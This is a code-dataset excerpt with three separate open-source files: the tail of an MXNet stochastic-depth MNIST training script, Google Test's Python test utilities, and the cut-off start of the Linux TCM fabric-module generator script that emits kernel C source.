conv = get_conv(
    name='conv0',
    data=data,
    num_filter=16,
    kernel=(3, 3),
    stride=(1, 1),
    pad=(1, 1),
    with_relu=True,
    bn_momentum=0.9
)
base_mod = mx.mod.Module(conv, label_names=None, context=contexts)
mod_seq = mx.mod.SequentialModule()
mod_seq.add(base_mod)
# One StochasticDepthModule per entry in death_rates, each wrapping a
# two-convolution residual block that may be skipped during training.
for i in range(len(death_rates)):
    conv = get_conv(
        name='conv0_%d' % i,
        data=mx.sym.Variable('data_%d' % i),
        num_filter=16,
        kernel=(3, 3),
        stride=(1, 1),
        pad=(1, 1),
        with_relu=True,
        bn_momentum=0.9
    )
    conv = get_conv(
        name='conv1_%d' % i,
        data=conv,
        num_filter=16,
        kernel=(3, 3),
        stride=(1, 1),
        pad=(1, 1),
        with_relu=False,
        bn_momentum=0.9
    )
    mod = sd_module.StochasticDepthModule(conv, data_names=['data_%d' % i],
                                          context=contexts, death_rate=death_rates[i])
    mod_seq.add(mod, auto_wiring=True)
# Classification head: ReLU -> flatten -> 10-way fully connected -> softmax.
act = mx.sym.Activation(mx.sym.Variable('data_final'), act_type='relu')
flat = mx.sym.Flatten(act)
pred = mx.sym.FullyConnected(flat, num_hidden=10)
softmax = mx.sym.SoftmaxOutput(pred, name='softmax')
mod_seq.add(mx.mod.Module(softmax, context=contexts, data_names=['data_final']),
            auto_wiring=True, take_labels=True)
n_epoch = 2
batch_size = 100
# Fetch/unpack the MNIST ubyte files next to this script if absent.
basedir = os.path.dirname(__file__)
mx.test_utils.get_mnist_ubyte()
train = mx.io.MNISTIter(
    image=os.path.join(basedir, "data", "train-images-idx3-ubyte"),
    label=os.path.join(basedir, "data", "train-labels-idx1-ubyte"),
    input_shape=(1, 28, 28), flat=False,
    batch_size=batch_size, shuffle=True, silent=False, seed=10)
val = mx.io.MNISTIter(
    image=os.path.join(basedir, "data", "t10k-images-idx3-ubyte"),
    label=os.path.join(basedir, "data", "t10k-labels-idx1-ubyte"),
    input_shape=(1, 28, 28), flat=False,
    batch_size=batch_size, shuffle=True, silent=False)
logging.basicConfig(level=logging.DEBUG)
mod_seq.fit(train, val, optimizer_params={'learning_rate': 0.01, 'momentum': 0.9},
            num_epoch=n_epoch, batch_end_callback=mx.callback.Speedometer(batch_size, 10))
| apache-2.0 |
oroulet/freeopcua | tests/gmock/gtest/test/gtest_test_utils.py | 1100 | 10812 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test utilities for Google C++ Testing Framework."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import atexit
import os
import shutil
import sys
import tempfile
import unittest
# Indirection so the test framework module can be swapped in one place.
_test_module = unittest
# Suppresses the 'Import not at the top of the file' lint complaint.
# pylint: disable-msg=C6204
try:
  import subprocess
  _SUBPROCESS_MODULE_AVAILABLE = True
except:
  # Pre-2.4 Pythons lack subprocess; fall back to popen2 (see Subprocess below).
  import popen2
  _SUBPROCESS_MODULE_AVAILABLE = False
# pylint: enable-msg=C6204
GTEST_OUTPUT_VAR_NAME = 'GTEST_OUTPUT'
# Platform detection, used e.g. to append '.exe' when locating binaries.
IS_WINDOWS = os.name == 'nt'
IS_CYGWIN = os.name == 'posix' and 'CYGWIN' in os.uname()[0]
# The environment variable for specifying the path to the premature-exit file.
PREMATURE_EXIT_FILE_ENV_VAR = 'TEST_PREMATURE_EXIT_FILE'
# Mutable snapshot of the environment, manipulated via SetEnvVar().
environ = os.environ.copy()
def SetEnvVar(env_var, value):
  """Sets/unsets an environment variable to a given value."""
  # A value of None means "remove the variable"; anything else is stored.
  if value is None:
    environ.pop(env_var, None)
  else:
    environ[env_var] = value
# Here we expose a class from a particular module, depending on the
# environment. The comment suppresses the 'Invalid variable name' lint
# complaint.
TestCase = _test_module.TestCase # pylint: disable-msg=C6409
# Initially maps a flag to its default value. After
# _ParseAndStripGTestFlags() is called, maps a flag to its actual value.
# Both directories default to the directory containing the invoking script.
_flag_map = {'source_dir': os.path.dirname(sys.argv[0]),
             'build_dir': os.path.dirname(sys.argv[0])}
# Guard so _ParseAndStripGTestFlags() only does its work once.
_gtest_flags_are_parsed = False
def _ParseAndStripGTestFlags(argv):
  """Parses and strips Google Test flags from argv. This is idempotent."""
  # Module-wide parse-once state; the global is required to rebind it.
  global _gtest_flags_are_parsed  # pylint: disable-msg=W0603
  if _gtest_flags_are_parsed:
    return
  _gtest_flags_are_parsed = True
  for flag in _flag_map:
    # An environment variable, when present, overrides the built-in default.
    if flag.upper() in os.environ:
      _flag_map[flag] = os.environ[flag.upper()]
    # A command-line flag overrides both; only the first occurrence is
    # consumed, and it is removed from argv in place.
    prefix = '--' + flag + '='
    index = 1  # Skips the program name.
    while index < len(argv):
      if argv[index].startswith(prefix):
        _flag_map[flag] = argv[index][len(prefix):]
        del argv[index]
        break
      index += 1
def GetFlag(flag):
  """Returns the value of the given flag."""
  # Ensure flags are parsed even when GetFlag() is called before Main();
  # _ParseAndStripGTestFlags() is idempotent, so repeat calls are cheap.
  _ParseAndStripGTestFlags(sys.argv)
  return _flag_map[flag]
def GetSourceDir():
  """Returns the absolute path of the directory where the .py files are."""
  source = GetFlag('source_dir')
  return os.path.abspath(source)
def GetBuildDir():
  """Returns the absolute path of the directory where the test binaries are."""
  build = GetFlag('build_dir')
  return os.path.abspath(build)
# Lazily-created shared temporary directory, removed at interpreter exit.
_temp_dir = None
def _RemoveTempDir():
  # atexit hook: best-effort cleanup of the shared temporary directory.
  if _temp_dir:
    shutil.rmtree(_temp_dir, ignore_errors=True)
atexit.register(_RemoveTempDir)
def GetTempDir():
  """Returns a directory for temporary files, creating it on first use."""
  global _temp_dir
  if _temp_dir is None:
    _temp_dir = tempfile.mkdtemp()
  return _temp_dir
def GetTestExecutablePath(executable_name, build_dir=None):
  """Returns the absolute path of the test binary given its name.
  The function will print a message and abort the program if the resulting file
  doesn't exist.
  Args:
    executable_name: name of the test binary that the test script runs.
    build_dir: directory where to look for executables, by default
               the result of GetBuildDir().
  Returns:
    The absolute path of the test binary.
  """
  directory = build_dir or GetBuildDir()
  path = os.path.abspath(os.path.join(directory, executable_name))
  # Windows and Cygwin binaries carry an .exe suffix.
  if (IS_WINDOWS or IS_CYGWIN) and not path.endswith('.exe'):
    path += '.exe'
  if os.path.exists(path):
    return path
  message = (
      'Unable to find the test binary. Please make sure to provide path\n'
      'to the binary via the --build_dir flag or the BUILD_DIR\n'
      'environment variable.')
  sys.stderr.write(message + '\n')
  sys.exit(1)
def GetExitStatus(exit_code):
  """Returns the argument to exit(), or -1 if exit() wasn't called.
  Args:
    exit_code: the result value of os.system(command).
  """
  if os.name == 'nt':
    # On Windows, os.system() returns the exit() argument directly and
    # os.WEXITSTATUS() doesn't work.
    return exit_code
  # On Unix, decode the wait()-style status word.
  if os.WIFEXITED(exit_code):
    return os.WEXITSTATUS(exit_code)
  return -1
class Subprocess:
  """Runs a child process and records its outcome (output and exit state)."""
  def __init__(self, command, working_dir=None, capture_stderr=True, env=None):
    """Changes into a specified directory, if provided, and executes a command.
    Restores the old directory afterwards.
    Args:
      command: The command to run, in the form of sys.argv.
      working_dir: The directory to change into.
      capture_stderr: Determines whether to capture stderr in the output member
        or to discard it.
      env: Dictionary with environment to pass to the subprocess.
    Returns:
      An object that represents outcome of the executed process. It has the
      following attributes:
        terminated_by_signal True iff the child process has been terminated
          by a signal.
        signal Sygnal that terminated the child process.
        exited True iff the child process exited normally.
        exit_code The code with which the child process exited.
        output Child process's stdout and stderr output
          combined in a string.
    """
    # The subprocess module is the preferrable way of running programs
    # since it is available and behaves consistently on all platforms,
    # including Windows. But it is only available starting in python 2.4.
    # In earlier python versions, we revert to the popen2 module, which is
    # available in python 2.0 and later but doesn't provide required
    # functionality (Popen4) under Windows. This allows us to support Mac
    # OS X 10.4 Tiger, which has python 2.3 installed.
    if _SUBPROCESS_MODULE_AVAILABLE:
      if capture_stderr:
        stderr = subprocess.STDOUT
      else:
        stderr = subprocess.PIPE
      p = subprocess.Popen(command,
                           stdout=subprocess.PIPE, stderr=stderr,
                           cwd=working_dir, universal_newlines=True, env=env)
      # communicate returns a tuple with the file obect for the child's
      # output.
      self.output = p.communicate()[0]
      self._return_code = p.returncode
    else:
      old_dir = os.getcwd()
      def _ReplaceEnvDict(dest, src):
        # Changes made by os.environ.clear are not inheritable by child
        # processes until Python 2.6. To produce inheritable changes we have
        # to delete environment items with the del statement.
        for key in dest.keys():
          del dest[key]
        dest.update(src)
      # When 'env' is not None, backup the environment variables and replace
      # them with the passed 'env'. When 'env' is None, we simply use the
      # current 'os.environ' for compatibility with the subprocess.Popen
      # semantics used above.
      if env is not None:
        old_environ = os.environ.copy()
        _ReplaceEnvDict(os.environ, env)
      try:
        if working_dir is not None:
          os.chdir(working_dir)
        if capture_stderr:
          p = popen2.Popen4(command)
        else:
          p = popen2.Popen3(command)
        p.tochild.close()
        self.output = p.fromchild.read()
        ret_code = p.wait()
      finally:
        os.chdir(old_dir)
        # Restore the old environment variables
        # if they were replaced.
        if env is not None:
          _ReplaceEnvDict(os.environ, old_environ)
      # Converts ret_code to match the semantics of
      # subprocess.Popen.returncode.
      if os.WIFSIGNALED(ret_code):
        self._return_code = -os.WTERMSIG(ret_code)
      else: # os.WIFEXITED(ret_code) should return True here.
        self._return_code = os.WEXITSTATUS(ret_code)
    # Decode the unified return code into the public outcome attributes.
    if self._return_code < 0:
      self.terminated_by_signal = True
      self.exited = False
      self.signal = -self._return_code
    else:
      self.terminated_by_signal = False
      self.exited = True
      self.exit_code = self._return_code
def Main():
  """Runs the unit test."""
  # Strip --gtest_* flags first; unittest.main() would otherwise choke
  # on them.
  _ParseAndStripGTestFlags(sys.argv)
  # The tested binaries should not be writing XML output files unless the
  # script explicitly instructs them to.
  # TODO(vladl@google.com): Move this into Subprocess when we implement
  # passing environment into it as a parameter.
  os.environ.pop(GTEST_OUTPUT_VAR_NAME, None)
  _test_module.main()
| lgpl-3.0 |
pio-masaki/android-kernel-at1s0 | Documentation/target/tcm_mod_builder.py | 2 | 43848 | #!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
# NOTE(review): tcm_dir appears unused in this portion of the script.
tcm_dir = ""
# Accumulates the fabric_ops entries emitted into the generated module.
fabric_ops = []
# Output directory for the generated fabric-module sources.
fabric_mod_dir = ""
# Target-port / initiator-port naming, set by the per-protocol include
# builders below ("lport"/"nport" for FC, "tport"/"iport" for SAS/iSCSI).
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
	"""Print an error message and abort the generator with exit status 1."""
	print(msg)
	sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
	"""Create the fabric-module output directory.

	Returns 1 when the directory already exists, None after creating it.
	Aborts via tcm_mod_err() when the directory cannot be created.
	"""
	if os.path.isdir(fabric_mod_dir_var):
		return 1
	print("Creating fabric_mod_dir: " + fabric_mod_dir_var)
	# Fix: os.mkdir() returns None, so the old "ret = os.mkdir(...);
	# if ret:" error check could never fire; trap the OSError instead.
	try:
		os.mkdir(fabric_mod_dir_var)
	except OSError:
		tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
	return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
	"""Emit <fabric_mod_name>_base.h for a Fibre Channel fabric module.

	Writes the nacl/tpg/lport structure definitions and records the FC
	port-naming convention ("lport"/"nport") in the module-level globals
	that later generators interpolate into identifiers.
	"""
	global fabric_mod_port
	global fabric_mod_init_port
	buf = ""
	f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
	print "Writing file: " + f
	p = open(f, 'w');
	if not p:
		tcm_mod_err("Unable to open file: " + f)
	buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
	buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
	buf += "\n"
	buf += "struct " + fabric_mod_name + "_nacl {\n"
	buf += "	/* Binary World Wide unique Port Name for FC Initiator Nport */\n"
	buf += "	u64 nport_wwpn;\n"
	buf += "	/* ASCII formatted WWPN for FC Initiator Nport */\n"
	buf += "	char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
	buf += "	/* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
	buf += "	struct se_node_acl se_node_acl;\n"
	buf += "};\n"
	buf += "\n"
	buf += "struct " + fabric_mod_name + "_tpg {\n"
	buf += "	/* FC lport target portal group tag for TCM */\n"
	buf += "	u16 lport_tpgt;\n"
	buf += "	/* Pointer back to " + fabric_mod_name + "_lport */\n"
	buf += "	struct " + fabric_mod_name + "_lport *lport;\n"
	buf += "	/* Returned by " + fabric_mod_name + "_make_tpg() */\n"
	buf += "	struct se_portal_group se_tpg;\n"
	buf += "};\n"
	buf += "\n"
	buf += "struct " + fabric_mod_name + "_lport {\n"
	buf += "	/* SCSI protocol the lport is providing */\n"
	buf += "	u8 lport_proto_id;\n"
	buf += "	/* Binary World Wide unique Port Name for FC Target Lport */\n"
	buf += "	u64 lport_wwpn;\n"
	buf += "	/* ASCII formatted WWPN for FC Target Lport */\n"
	buf += "	char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
	buf += "	/* Returned by " + fabric_mod_name + "_make_lport() */\n"
	buf += "	struct se_wwn lport_wwn;\n"
	buf += "};\n"
	ret = p.write(buf)
	if ret:
		tcm_mod_err("Unable to write f: " + f)
	p.close()
	# FC naming: target side is "lport", initiator side is "nport".
	fabric_mod_port = "lport"
	fabric_mod_init_port = "nport"
	return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
	"""Emit <fabric_mod_name>_base.h for a SAS fabric module.

	Writes the nacl/tpg/tport structure definitions and records the SAS
	port-naming convention ("tport"/"iport") in the module-level globals
	that later generators interpolate into identifiers.
	"""
	global fabric_mod_port
	global fabric_mod_init_port
	buf = ""
	f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
	print "Writing file: " + f
	p = open(f, 'w');
	if not p:
		tcm_mod_err("Unable to open file: " + f)
	buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
	buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
	buf += "\n"
	buf += "struct " + fabric_mod_name + "_nacl {\n"
	buf += "	/* Binary World Wide unique Port Name for SAS Initiator port */\n"
	buf += "	u64 iport_wwpn;\n"
	buf += "	/* ASCII formatted WWPN for Sas Initiator port */\n"
	buf += "	char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
	buf += "	/* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
	buf += "	struct se_node_acl se_node_acl;\n"
	buf += "};\n\n"
	buf += "struct " + fabric_mod_name + "_tpg {\n"
	buf += "	/* SAS port target portal group tag for TCM */\n"
	buf += "	u16 tport_tpgt;\n"
	buf += "	/* Pointer back to " + fabric_mod_name + "_tport */\n"
	buf += "	struct " + fabric_mod_name + "_tport *tport;\n"
	buf += "	/* Returned by " + fabric_mod_name + "_make_tpg() */\n"
	buf += "	struct se_portal_group se_tpg;\n"
	buf += "};\n\n"
	buf += "struct " + fabric_mod_name + "_tport {\n"
	buf += "	/* SCSI protocol the tport is providing */\n"
	buf += "	u8 tport_proto_id;\n"
	buf += "	/* Binary World Wide unique Port Name for SAS Target port */\n"
	buf += "	u64 tport_wwpn;\n"
	buf += "	/* ASCII formatted WWPN for SAS Target port */\n"
	buf += "	char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
	buf += "	/* Returned by " + fabric_mod_name + "_make_tport() */\n"
	buf += "	struct se_wwn tport_wwn;\n"
	buf += "};\n"
	ret = p.write(buf)
	if ret:
		tcm_mod_err("Unable to write f: " + f)
	p.close()
	# SAS naming: target side is "tport", initiator side is "iport".
	fabric_mod_port = "tport"
	fabric_mod_init_port = "iport"
	return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
	"""Emit <fabric_mod_name>_base.h for an iSCSI fabric module.

	Writes the nacl/tpg/tport structure definitions (IQN-based naming, no
	binary WWPNs) and records the iSCSI port-naming convention
	("tport"/"iport") in the module-level globals used by later generators.
	"""
	global fabric_mod_port
	global fabric_mod_init_port
	buf = ""
	f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
	print "Writing file: " + f
	p = open(f, 'w');
	if not p:
		tcm_mod_err("Unable to open file: " + f)
	buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
	buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
	buf += "\n"
	buf += "struct " + fabric_mod_name + "_nacl {\n"
	buf += "	/* ASCII formatted InitiatorName */\n"
	buf += "	char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
	buf += "	/* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
	buf += "	struct se_node_acl se_node_acl;\n"
	buf += "};\n\n"
	buf += "struct " + fabric_mod_name + "_tpg {\n"
	buf += "	/* iSCSI target portal group tag for TCM */\n"
	buf += "	u16 tport_tpgt;\n"
	buf += "	/* Pointer back to " + fabric_mod_name + "_tport */\n"
	buf += "	struct " + fabric_mod_name + "_tport *tport;\n"
	buf += "	/* Returned by " + fabric_mod_name + "_make_tpg() */\n"
	buf += "	struct se_portal_group se_tpg;\n"
	buf += "};\n\n"
	buf += "struct " + fabric_mod_name + "_tport {\n"
	buf += "	/* SCSI protocol the tport is providing */\n"
	buf += "	u8 tport_proto_id;\n"
	buf += "	/* ASCII formatted TargetName for IQN */\n"
	buf += "	char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
	buf += "	/* Returned by " + fabric_mod_name + "_make_tport() */\n"
	buf += "	struct se_wwn tport_wwn;\n"
	buf += "};\n"
	ret = p.write(buf)
	if ret:
		tcm_mod_err("Unable to write f: " + f)
	p.close()
	# iSCSI naming: target side is "tport", initiator side is "iport".
	fabric_mod_port = "tport"
	fabric_mod_init_port = "iport"
	return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
	"""Dispatch to the per-protocol *_base.h generator.

	Aborts the script (exit status 1) on an unknown protocol identifier.
	"""
	if proto_ident == "FC":
		tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
		return
	if proto_ident == "SAS":
		tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
		return
	if proto_ident == "iSCSI":
		tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
		return
	print("Unsupported proto_ident: " + proto_ident)
	sys.exit(1)
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
    """Generate <fabric_mod_name>_configfs.c for the new fabric module.

    Emits the configfs glue for the skeleton: make/drop callbacks for
    node ACLs, TPGs and WWN ports, the target_core_fabric_ops table
    wiring those callbacks to the <fabric_mod_name>_* handlers produced
    by tcm_mod_dump_fabric_ops(), and module init/exit code that
    registers/deregisters the fabric with TCM.

    Relies on the module-level globals fabric_mod_port /
    fabric_mod_init_port having been set by one of the *_include
    builders before this runs.
    """
    buf = ""
    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
    print "Writing file: " + f

    p = open(f, 'w');
    # NOTE(review): dead check -- open() raises on failure rather than
    # returning a falsy object, so tcm_mod_err() is never reached here.
    if not p:
        tcm_mod_err("Unable to open file: " + f)

    buf = "#include <linux/module.h>\n"
    buf += "#include <linux/moduleparam.h>\n"
    buf += "#include <linux/version.h>\n"
    buf += "#include <generated/utsrelease.h>\n"
    buf += "#include <linux/utsname.h>\n"
    buf += "#include <linux/init.h>\n"
    buf += "#include <linux/slab.h>\n"
    buf += "#include <linux/kthread.h>\n"
    buf += "#include <linux/types.h>\n"
    buf += "#include <linux/string.h>\n"
    buf += "#include <linux/configfs.h>\n"
    buf += "#include <linux/ctype.h>\n"
    buf += "#include <asm/unaligned.h>\n\n"
    buf += "#include <target/target_core_base.h>\n"
    buf += "#include <target/target_core_transport.h>\n"
    buf += "#include <target/target_core_fabric_ops.h>\n"
    buf += "#include <target/target_core_fabric_configfs.h>\n"
    buf += "#include <target/target_core_fabric_lib.h>\n"
    buf += "#include <target/target_core_device.h>\n"
    buf += "#include <target/target_core_tpg.h>\n"
    buf += "#include <target/target_core_configfs.h>\n"
    buf += "#include <target/target_core_base.h>\n"
    buf += "#include <target/configfs_macros.h>\n\n"
    buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
    buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"

    buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
    buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"

    # make_nodeacl(): the wwpn local is only declared for WWN-based
    # protocols (FC/SAS); iSCSI node ACLs are name-based.
    buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
    buf += " struct se_portal_group *se_tpg,\n"
    buf += " struct config_group *group,\n"
    buf += " const char *name)\n"
    buf += "{\n"
    buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
    buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " u64 wwpn = 0;\n"
    buf += " u32 nexus_depth;\n\n"
    buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
    buf += " return ERR_PTR(-EINVAL); */\n"
    buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
    buf += " if (!(se_nacl_new))\n"
    buf += " return ERR_PTR(-ENOMEM);\n"
    buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
    buf += " nexus_depth = 1;\n"
    buf += " /*\n"
    buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
    buf += " * when converting a NodeACL from demo mode -> explict\n"
    buf += " */\n"
    buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
    buf += " name, nexus_depth);\n"
    buf += " if (IS_ERR(se_nacl)) {\n"
    buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
    buf += " return se_nacl;\n"
    buf += " }\n"
    buf += " /*\n"
    buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
    buf += " */\n"
    buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
    buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
    buf += " return se_nacl;\n"
    buf += "}\n\n"

    buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
    buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
    buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
    buf += " kfree(nacl);\n"
    buf += "}\n\n"

    buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
    buf += " struct se_wwn *wwn,\n"
    buf += " struct config_group *group,\n"
    buf += " const char *name)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
    buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
    buf += " unsigned long tpgt;\n"
    buf += " int ret;\n\n"
    buf += " if (strstr(name, \"tpgt_\") != name)\n"
    buf += " return ERR_PTR(-EINVAL);\n"
    buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
    buf += " return ERR_PTR(-EINVAL);\n\n"
    buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
    buf += " if (!(tpg)) {\n"
    buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
    buf += " return ERR_PTR(-ENOMEM);\n"
    buf += " }\n"
    buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
    buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
    buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
    buf += " &tpg->se_tpg, (void *)tpg,\n"
    buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
    buf += " if (ret < 0) {\n"
    buf += " kfree(tpg);\n"
    buf += " return NULL;\n"
    buf += " }\n"
    buf += " return &tpg->se_tpg;\n"
    buf += "}\n\n"

    buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
    buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
    buf += " core_tpg_deregister(se_tpg);\n"
    buf += " kfree(tpg);\n"
    buf += "}\n\n"

    buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
    buf += " struct target_fabric_configfs *tf,\n"
    buf += " struct config_group *group,\n"
    buf += " const char *name)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " u64 wwpn = 0;\n\n"
    buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
    buf += " return ERR_PTR(-EINVAL); */\n\n"
    buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
    buf += " if (!(" + fabric_mod_port + ")) {\n"
    buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
    buf += " return ERR_PTR(-ENOMEM);\n"
    buf += " }\n"
    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
    buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "__NAMELEN, wwpn); */\n\n"
    buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
    buf += "}\n\n"

    buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
    buf += " kfree(" + fabric_mod_port + ");\n"
    buf += "}\n\n"

    buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
    buf += " struct target_fabric_configfs *tf,\n"
    buf += " char *page)\n"
    buf += "{\n"
    buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
    buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
    buf += " utsname()->machine);\n"
    buf += "}\n\n"
    buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
    buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
    buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
    buf += " NULL,\n"
    buf += "};\n\n"

    # The fabric ops table: every entry points at a handler emitted by
    # tcm_mod_dump_fabric_ops() into <fabric_mod_name>_fabric.c.
    buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
    buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
